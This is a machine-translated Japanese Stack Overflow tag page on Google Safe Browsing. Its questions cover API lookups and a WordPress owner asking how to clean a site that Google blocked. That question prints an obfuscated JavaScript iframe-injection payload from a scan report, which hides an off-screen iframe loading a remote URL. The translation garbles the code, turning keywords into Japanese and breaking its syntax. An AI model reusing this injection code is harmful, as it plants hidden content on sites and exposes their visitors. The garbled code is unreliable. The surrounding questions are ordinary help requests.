問題タブ [safe-browsing]
For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.
javascript - 報告された攻撃ページを修正するにはどうすればよいですか?
私の WordPress サイトが悪意のあるサイトとして Google によってブロックされています。多くの調査の後、Sucuri を見つけてスキャンを実行しました。
https://sitecheck.sucuri.net/results/www.zuzu.com
問題は次のとおりです。
問題が検出されました - ウェブサイトのマルウェア
定義 - mwjs-iframe-injected530?web.js.malware.pwframe.001
感染した URL http://www.zuzu.com/wp-includes/js/comment-reply.min.js?ver=f1397b4577f4eac1e6712291231852a5
ペイロード:
既知の JavaScript マルウェア。詳細: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?web.js.malware.pwframe.001var _0xdc56=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\ x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\ x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D"," \x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\ x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\ x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x74\x72\x79\x6D\x79\x66\x69\x6E\x67\x65\x72 \x2E\x77\x65\x62\x73\x69\x74\x65\x2F\x61\x64\x2F\x3F\x69\x64\x3D\x36\x39\x34\x33\x36\x33\x31\x26\x6B \x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x76\x65\x72\x74\x3D\x55\x48\x68\x75\x79\x34","\x69 \x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\ x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\ x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\ x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66 \x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];ウィンドウ[_0xdc56[0]]=関数(){関数_0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5=新しい日付();_0x739ex5_0xdc56[2] ;};if(_0x739ex2&&_0x739ex3){document[_0xdc56[3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {false を返す};} function _0x739ex6(_0x739ex2){var _0x739ex3= new RegExp(_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56} false}[10return]; return _0x739ex4[1]?_0x739ex4[1]:false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1) ;var _0x739ex8=document_0xdc56[14];var _0x739ex9=925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739xdc56[09]document[0x739exa+1 [_0xdc56[21]]_0xdc56[20];};};window[_0xdc56[0]]=関数(){関数_0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5=新しい日付();_0x739ex5_0xdc56[2];};if(_0x739ex2&&_0x739ex3){ [3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {false を返す};}関数 _0x739ex6(_0x739ex2){var _0x739ex3= 新しい正規表現(_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10]}else {false を返す};_0x739ex4[1]?_0x739ex4[1] を返す: false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1);var _0x739ex8=document_0xdc56[14];var _0x739ex9 =925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+_0xdc56[19];ドキュメント[_0xdc56[21]]_0xdc56[20]; };};window[_0xdc56[0]]=関数(){関数_0x739ex1(_0x739ex2,_0x739ex3,_0x739ex4){if(_0x739ex4){var _0x739ex5=新しい日付();_0x739ex5_0xdc56[2];};if(_0x739ex2&&_0x739ex3){ [3]]=_0x739ex2+_0xdc56[4]+_0x739ex3+(_0x739ex4?_0xdc56[5]+_0x739ex5_0xdc56[6]:_0xdc56[7])}else {false を返す};}関数 _0x739ex6(_0x739ex2){var _0x739ex3= 新しい正規表現(_0x739ex2+_0xdc56[8]);var _0x739ex4=_0x739ex3_0xdc56[9];if(_0x739ex4){_0x739ex4=_0x739ex4[0]_0xdc56[10]}else {false を返す};_0x739ex4[1]?_0x739ex4[1] を返す: false;}var _0x739ex7=_0x739ex6(_0xdc56[11]);if(_0x739ex7!=_0xdc56[12]){_0x739ex1(_0xdc56[11],_0xdc56[12],1);var _0x739ex8=document_0xdc56[14];var _0x739ex9 =925365;var _0x739exa=_0xdc56[15]+_0x739ex9+_0xdc56[16];_0x739ex8[_0xdc56[17]]=_0xdc56[18]+_0x739exa+_0xdc56[19];ドキュメント[_0xdc56[21]]_0xdc56[20]; };};
このマルウェアを削除するには、次に何をする必要がありますか?
node.js - Google セーフ ブラウズ API ルックアップ Node.js
Google セーフサーチ ルックアップを機能させるのに問題があります。ここに私が試しているコードがあり、私は常に{}
応答を得ています
ドキュメントを正しく理解しているかどうか、またはリクエストからパラメーターが欠落しているかどうかはわかりません。私は別のURLで試しました。Web から悪意のある URL を検索しようとしましたが、これらはブラウザーによって悪意のあるものとして識別されましたが、それらも空白の応答を返しました。ここに私がフォローしているドキュメントがあります
私も彼らのAPIを試しましたthreatLists:list
が、常にエラーが発生します
これが私が得る出力です:
php - セーフ ブラウジング API v4. - 空の応答
Safe Browsing API を実装しました。ドメインとして宣言されているドメインがありphishing
ます。私はそれらをテストし、応答として空の配列を取得しました。
私の質問は、Google セーフ ブラウジング API にはPHISHING
もう型がありますか? セーフ ブラウジング リストを取得しましたが、これらのタイプしか見つかりませんでした。
MALWARE
、
UNWANTED_SOFTWARE
、
SOCIAL_ENGINEERING
、
POTENCIALLY_HARMFUL_APPLICATION
タイプフィッシングでドメインをテストできないため、今は心配しています。
誰もこれについて何か知っていますか?
security - Google の Safe Browsing マルウェア フラグと Bit.ly カスタム ドメイン
Google の Safe Browsing Site Statusbit.ly
によってフラグが立てられることなくカスタム ドメインを実装する方法をよりよく理解しようとしています。
私が理解しているように、Google によって既にフラグが設定されている別のサイトへのリンクがサイトにある場合、Google によってフラグが設定される可能性があります。
URL を短縮するためにドメインを使用している場合、これはどのように機能しますか?
たとえば、Bitly は Google によって「潜在的に危険」とフラグ付けされていますが、「危険」ではありません。したがって、ドメインはブラウザのマルウェア ブラックリストに追加されません。Bitly は、ブラックリストに登録されることなく「危険」とフラグ付けされたサイトへのリンクを持つことができますが、同じインシデントが発生した場合、カスタム ドメインは「危険」フラグを受け取ります。
bit.ly
リンク先のサイトが「危険」とフラグ付けされている場合、Google によってブラックリストに登録されるリスクなしでカスタム ドメインを実装する方法はありますか?
スクリーンショット 1 - Google のセーフ ブラウジング サイト ステータスでフラグが立てられていないサイト
python - Google Safe Browsing API v4 および Python リクエストでの予期しない応答
フィッシング URL の可能性を検証するための小さな機能を実装しようとしていますが、Google Safe Browsing API を使用するのが良い出発点になると考えました。
API ドキュメントを読んだ後、私は物事を処理できると思い、次のコードをまとめました。
私がする場合
print (json.dumps(payload, indent=4)
それはすべて大丈夫に見えます。しかし、Google から返された返信は同意しません。
{'エラー': {'メッセージ': '無効な JSON ペイロードを受信しました。\'threat_info\' の不明な名前 "threat_entries:": フィールドが見つかりません。 /google.rpc.BadRequest', 'fieldViolations': [{'field': 'threat_info', 'description': '無効な JSON ペイロードを受け取りました。不明な名前 "threat_entries:" at \'threat_info\': フィールドが見つかりません.'}]}]}} {'X-Frame-Options': 'SAMEORIGIN', 'Transfer-Encoding': 'chunked', 'Cache- Control': 'private', 'Date': 'Tue, 25 Oct 2016 07:55:30 GMT', 'Content-Type': 'application/json; charset=UTF-8', 'Alt-Svc': 'quic=":443"; ma=2592000; v="36,35,34,33,32"', 'X-Content-Type-Options': 'nosniff', 'Content-Encoding': 'gzip', 'X-XSS-Protection': '1; mode=block', 'Server': 'ESF'} application/json; 文字セット=UTF-8
いつものように、自分の間違いを見つけることができません。他の誰かがそれを見つけて、私を正しい軌道に乗せることはできますか?
safe-browsing - Google セーフブラウジング API から取得したハッシュ プレフィックスを格納するために使用できるデータベースはどれですか?
google safebrowsing api https://developers.google.com/safe-browsing/v4/から取得したデータ (URL のハッシュのプレフィックス) を保存する場合、推奨されるデータベースはどれですか?
Google セーフブラウジング API から取得したハッシュ プレフィックスと完全なハッシュを格納するためのローカル データベースを作成したいと考えています。データベースの整合性をチェックするために、ローカル データベース内のプレフィックスの sha-256 (チェックサム) を各 update 呼び出しの後に辞書順に計算する必要があります。
誰かが私の要件に似たようなことをしようとしましたか?